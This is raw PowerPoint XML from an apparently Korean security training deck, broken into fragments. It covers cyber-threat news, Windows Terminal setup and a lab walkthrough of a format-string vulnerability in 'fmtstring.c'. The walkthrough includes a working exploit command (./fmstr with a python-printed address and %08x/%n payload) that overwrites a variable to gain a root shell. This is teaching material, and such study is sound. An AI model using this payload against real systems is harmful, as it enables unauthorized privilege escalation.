            <a:ext cx="3323908" cy="18696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T 강국 맞나?...한국, 사이버테러 대비 '최약체'&quot;- 헤럴드경제">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE6EA36-E106-49D8-8F47-0E9B862765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2620" y="1987271"/>
            <a:ext cx="4331741" cy="23191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637A179-139D-4332-9FC8-EC389ABB79B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508390" y="1820849"/>
            <a:ext cx="4162081" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>아시아태평양 국가보안 전망 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>보고서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>(Deloitte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>Asia-Pacific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>Defense Outlook)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D921E9-C7C7-4C09-8071-260B4256A31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588" r="47943"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8745711" y="1619512"/>
            <a:ext cx="2608089" cy="276826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61BC58C4-1E2A-49C6-8CD1-F584C41FB8A9}"/>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FD589BE-FC61-40B6-8213-090DCB75CD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47281FC2-8410-4810-8440-D9EC856DC08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10" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE686CB-61B0-4615-B924-C2427D9E852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5287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탐색기에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“store” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 검색한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>Strore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </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검색 버튼을 눌러서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>windows terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 검색하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설치</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0C0220-BD71-451C-9848-892FD7C1DAA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626576" y="2223394"/>
            <a:ext cx="4855501" cy="779627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="직사각형 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5E740C-31BC-4117-B0BF-7924CFA11452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10776856" y="2358914"/>
            <a:ext cx="302821" cy="154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2CED94EB-2409-45C2-AF1A-A23868AB9F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="5012"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312223" y="2387986"/>
            <a:ext cx="3526844" cy="3068553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC6FE04F-909B-4CDC-8EF7-C924D7705391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6628111" y="3114896"/>
            <a:ext cx="4855501" cy="955712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0601FCE5-9621-4F51-986F-442225166FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626576" y="4191914"/>
            <a:ext cx="3087769" cy="1044673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E64B85-DE89-4B4C-9B98-721759D8D6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10157835" y="4184902"/>
            <a:ext cx="1324242" cy="1051685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="화살표: 오른쪽 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FEF55D-EC09-4303-BEBB-9A88B50D62E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9888517" y="4651367"/>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F5FEB210-CDB4-41A5-A367-ACBC559291D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="-1" r="201" b="26617"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626576" y="5360141"/>
            <a:ext cx="3029488" cy="876067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="직사각형 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17B329D-56E0-41F4-A848-155BA347B371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181378" y="5236587"/>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B15E4711-8FD7-4DB7-95DA-D2DB63ADE2B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312223" y="2775155"/>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404853C1-981E-4A37-B507-0DB64650E834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9591188" y="3429000"/>
            <a:ext cx="1234774" cy="273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328DC192-1FB9-417C-9706-8C2C1FF55BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8923061" y="4403149"/>
            <a:ext cx="733003"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hlinkClick r:id="rId8"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352D705D-AF26-483F-8B7B-E3D0BF76F0CB}"/>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5405CB31-1518-4C6C-AB81-4795BE5CDD8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E01376F3-9890-4051-B698-8F7B589F0D2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9" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9ECDEF-88AF-4F14-8F87-9E77F2C1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2812327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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 되도록 공격 및 루트 권한으로 실행할 명령 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>입력창</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%76x.%08n“’)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로 변경되어 루트 권한으로 명령을 실행시킬 수 있는 프롬프트가 등장</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8)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endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6589769-D3DB-461C-9422-07580D15006E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" r="-782" b="9246"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479404" y="1085425"/>
            <a:ext cx="5442227" cy="1318996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A4B83F5-6C76-4AE9-A33C-D8DEA8F451B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="885533322"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="462566"/>
          <a:ext cx="5352566" cy="4151376"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5352566">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="56090381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291666905"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39051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962474"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68609" name="_x617371528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C24BBB6-4DE7-4678-BAA1-C8F9247FB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543" y="1003287"/>
            <a:ext cx="4803775" cy="3594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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6BA5BDA-2224-416F-B4ED-57AC93DA5136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1" t="63142" r="30"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317137" y="5154663"/>
            <a:ext cx="4981050" cy="1021578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4145298-F83E-4B05-A849-03F2F093C8E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F905A27-1A83-439A-9D1D-239F3235032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E8305C6-4131-4922-8067-5913E3430D4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5F30F37C-D072-4FB9-8F8D-75C99D1D519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621202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1FA8A66-0FC4-40A5-BC51-C1EA3C9110D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="356331"/>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다시 공격을 실시하여 루트 권한 쉘 획득 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및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4" name="그룹 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82AB77F8-281F-4573-AA3E-D9FAA675C6A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D16C4284-EEB2-4B4E-A15E-F0CC585BE9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328B20D0-5FDF-4615-A72C-60F5EDEFCD7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E704DAAE-B6BA-4059-BCE2-26D93684BD8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6996093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DE520DA-B504-4C1C-8096-919BFF01D7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17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD3A2F5-6F8D-463B-9CA5-E4E12BE65F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2E53C2E-B931-4F95-9DFB-30866880C268}"/>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3C1D8E86-851C-4874-937A-9DD64EA82A87}"/>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29FCFC1C-5E87-435E-B4F3-DB0D38C6C5C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721C875A-961A-4C72-8951-8799030E48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74241C0-E0AC-4A46-BB1D-8FAFA9A8B54F}"/>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5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="그룹 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14499E59-0E8F-4DFF-A14B-09896D8DE179}"/>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388111DB-73E3-4581-B3EE-62C8917D8CE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D0BF6F80-2F29-4811-ABD8-87EB33BD00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9FF4B166-EDE2-4FE1-BD06-49FA5A7A40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721273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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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다음 명령을 입력하여 루트 권한으로 명령을 실행할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.%76x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.%08n</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</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함수 사용으로 포맷 스트링 취약점이 존재함을 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71289408-266B-4678-95B9-C39EDF85F58E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521252" y="1729482"/>
            <a:ext cx="4877816" cy="1268222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 132">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3280749-911A-45C3-8C2E-C33736B18870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="3621892"/>
            <a:ext cx="4954016" cy="2797683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 134">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208F48A0-69F8-402A-952F-CA7A5DE027EE}"/>
